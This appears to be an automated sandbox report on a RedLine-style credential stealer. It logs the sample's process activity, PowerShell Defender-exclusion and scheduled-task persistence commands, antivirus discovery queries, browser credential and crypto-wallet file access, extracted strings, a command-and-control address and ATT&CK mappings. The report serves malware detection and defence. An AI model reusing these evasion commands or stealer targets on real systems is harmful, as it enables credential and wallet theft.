                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Users\user\Desktop\tfF3UBTdr8.exe "C:\Users\user\Desktop\tfF3UBTdr8.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp"
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Users\user\AppData\Roaming\WltfeVzR.exe "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Users\user\Desktop\tfF3UBTdr8.exe VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Users\user\AppData\Roaming\WltfeVzR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: WltfeVzR.exe, 00000010.00000002.2335155769.0000000006D46000.00000004.00000020.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2331810633.000000000649A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara match File source: dump.pcap, type: PCAP
                    Source: Yara match File source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: tfF3UBTdr8.exe PID: 1492, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: WltfeVzR.exe PID: 6784, type: MEMORYSTR
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $sq2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereumx
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $sq6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe File opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 1492, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 6784, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 1492, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 6784, type: MEMORYSTR
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 221 Windows Management Instrumentation | 1 Scheduled Task/Job | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 331 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 3 Data from Local System | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 241 Virtualization/Sandbox Evasion | Security Account Manager | 241 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    [Behavior graph. Behavior Graph ID: 1501611, Sample: tfF3UBTdr8.exe, Startdate: 30/08/2024, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label | Link
                    tfF3UBTdr8.exe | 68% | ReversingLabs | ByteCode-MSIL.Spyware.Redline |
                    tfF3UBTdr8.exe | 45% | Virustotal | | Browse
                    tfF3UBTdr8.exe | 100% | Joe Sandbox ML | |
                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\WltfeVzR.exe | 68% | ReversingLabs | ByteCode-MSIL.Spyware.Redline |
                    C:\Users\user\AppData\Roaming\WltfeVzR.exe | 45% | Virustotal | | Browse
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    api.ip.sb | 0% | Virustotal | | Browse
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.ip.sb | unknown | unknown | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    http://185.222.57.91:55615/ | true | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                    185.222.57.91:55615 | true | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://ipinfo.io/ip%appdata%tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: safe
